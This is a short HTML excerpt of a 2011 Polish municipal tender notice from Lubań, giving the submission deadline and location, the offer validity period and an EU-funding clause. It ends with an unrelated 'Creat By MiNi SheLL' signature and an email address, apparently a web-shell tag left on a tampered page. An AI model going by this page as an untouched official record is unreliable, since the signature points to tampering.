<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2011 godzina 12:00, miejsce: siedziba Wydziału Inwestycji                       i Gospodarki Komunalnej Urzędu Miasta Lubań - w Lubaniu przy Placu Lompy 1, pokój              nr 9  (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com